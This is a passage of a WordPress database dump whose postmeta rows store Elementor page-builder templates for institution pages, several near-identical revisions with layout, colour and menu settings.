pe\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":78.09},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":21.855},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26800,3911,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(26801,3911,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(26805,2078,'_wp_old_date','2019-11-14'),(26806,2081,'_wp_old_date','2019-11-14'),(26807,2080,'_wp_old_date','2019-11-14'),(26808,2079,'_wp_old_date','2019-11-14'),(26809,2082,'_wp_old_date','2019-11-14'),(26810,2702,'_wp_old_date','2019-11-23'),(26811,3912,'_elementor_edit_mode','builder'),(26812,3912,'_elementor_template_type','single-post'),(26813,3912,'_elementor_version','3.4.0'),(26814,3912,'_elementor_pro_version','3.3.6'),(26815,3912,'_wp_page_template','default'),(26816,3912,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}]},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":78.09,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":21.855,\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\"},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26818,3912,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(26819,3912,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(26832,3914,'_elementor_edit_mode','builder'),(26833,3914,'_elementor_template_type','single-post'),(26834,3914,'_elementor_version','3.4.0'),(26835,3914,'_elementor_pro_version','3.3.6'),(26836,3914,'_wp_page_template','default'),(26837,3914,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}]},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.676,\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\"},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#0A3C11\",\"color_menu_item_hover\":\"#11AD14\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"-20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26839,3914,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(26840,3914,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(26842,3915,'_elementor_edit_mode','builder'),(26843,3915,'_elementor_template_type','single-post'),(26844,3915,'_elementor_version','3.4.0'),(26845,3915,'_elementor_pro_version','3.3.6'),(26846,3915,'_wp_page_template','default'),(26847,3915,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}]},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.676,\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\"},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#11AD14\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"-20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26849,3915,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(26850,3915,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(26852,3916,'_elementor_edit_mode','builder'),(26853,3916,'_elementor_template_type','single-post'),(26854,3916,'_elementor_version','3.4.0'),(26855,3916,'_elementor_pro_version','3.3.6'),(26856,3916,'_wp_page_template','default'),(26857,3916,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}]},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.676,\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\"},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"-20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26859,3916,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(26860,3916,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(26862,3917,'_elementor_edit_mode','builder'),(26863,3917,'_elementor_template_type','single-post'),(26864,3917,'_elementor_version','3.4.0'),(26865,3917,'_elementor_pro_version','3.3.6'),(26866,3917,'_wp_page_template','default'),(26867,3917,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}]},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.676,\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\"},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas fa-plus\",\"library\":\"fa-solid\"},\"color_menu_item\":\"#11AD14\",\"color_menu_item_hover\":\"#0A3C11\",\"padding_horizontal_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"menu_space_between\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"-20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26869,3917,'_elementor_conditions','a:4:{i:0;s:28:\"include/singular/institution\";i:1;s:41:\"include/singular/in_institutions_category\";i:2;s:50:\"include/singular/in_institutions_category_children\";i:3;s:38:\"include/singular/institution_by_author\";}'),(26870,3917,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:18:\"single/institution\";s:10:\"preview_id\";s:4:\"1582\";}'),(26873,3918,'_elementor_edit_mode','builder'),(26874,3918,'_elementor_template_type','single-post'),(26875,3918,'_elementor_version','3.4.0'),(26876,3918,'_elementor_pro_version','3.3.6'),(26877,3918,'_wp_page_template','default'),(26878,3918,'_elementor_data','[{\"id\":\"12002fa\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"090d30d\"}]},\"elements\":[{\"id\":\"c8cd4ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d4bec19\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"cc70076\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"4aa672a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":74.269,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b15ea6e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#0A3C11\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"9099e3a\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"44d8a81\",\"elType\":\"widget\",\"settings\":{\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"theme-post-content\"}],\"isInner\":true},{\"id\":\"f1c39ee\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":25.676,\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\"},\"elements\":[{\"id\":\"6e47c97\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"204b950\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainstitution_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"7380147\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22institution%3A714%3Ainternet%22%7D\\\"]\"},\"image_size\":\"thumbnail\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"26ac35b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Existing System\",\"align\":\"center\",\"title_color\":\"#0A3C11\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47c6b38\",\"elType\":\"widget\",\"settings\":{\"menu\":\"external_data_menu\",\"layout\":\"vertical\",\"align_items\":\"left\",\"pointer\":\"none\",\"submenu_icon\":{\"value\":\"fas 